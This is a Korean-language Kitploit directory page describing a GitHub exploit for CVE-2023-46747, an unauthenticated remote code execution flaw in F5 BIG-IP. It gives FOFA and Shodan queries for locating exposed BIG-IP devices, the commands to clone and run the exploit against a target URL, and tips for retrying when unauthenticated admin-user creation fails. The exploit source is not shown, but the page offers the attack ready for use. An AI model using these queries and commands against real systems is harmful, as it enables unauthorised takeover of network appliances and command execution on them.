Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/w01fh4cker/cve-2023-46747-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationRed Teaming
GitHubw01fh4cker/cve-2023-46747-rce

CVE-2023-46747-RCE

CVE-2023-46747용 익스플로잇, F5 BIG-IP의 원격 코드 실행 취약점으로 무단 사용자 생성 및 명령 실행을 허용합니다.

저장소 보기
20947121년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

취약점 세부 정보

fofa:

root@kitploit:~
(title="BIG-IP®" || icon_hash="-335242539")

shodan

root@kitploit:~
title:"BIG-IP®"

영향을 받는 버전

https://my.f5.com/manage/s/article/K000137353

취약점 재현

  1. 현재 여기서 사용자는 admin만 있습니다: image

  2. 스크립트 실행:

root@kitploit:~
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

명령이 성공적으로 실행되었습니다:
image

  1. 인증 없이 새 사용자가 성공적으로 생성되었습니다: image

한계점

일부 버전에서 익스플로잇이 실패합니다. 참고: https://twitter.com/joel_land/status/1729147886615818732.

질문과 답변

  1. Q: 토큰 획득 실패?
    A: 테스트 사이트에 취약점이 반드시 없다고 말할 수는 없습니다. 인증 없이 사용자를 생성하는 것이 100% 성공하는 것은 아니기 때문입니다. 때로는 어떤 이유로 첫 번째 단계에서 사용자를 생성하지 못하여 두 번째 단계에서 토큰을 얻을 수 없습니다. 따라서 몇 번 더 시도해 보시기 바랍니다. 그래도 작동하지 않으면 실제로 취약점이 없는 것일 수 있습니다.

잡설

이 스크립트 https://github.com/BishopFox/bigip-scanner를 사용하여 F5 BIG-IP 버전 정보를 수집할 수 있습니다. 훌륭합니다!

참고 자료

https://github.com/projectdiscovery/nuclei-templates/pull/8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747

도구 다운로드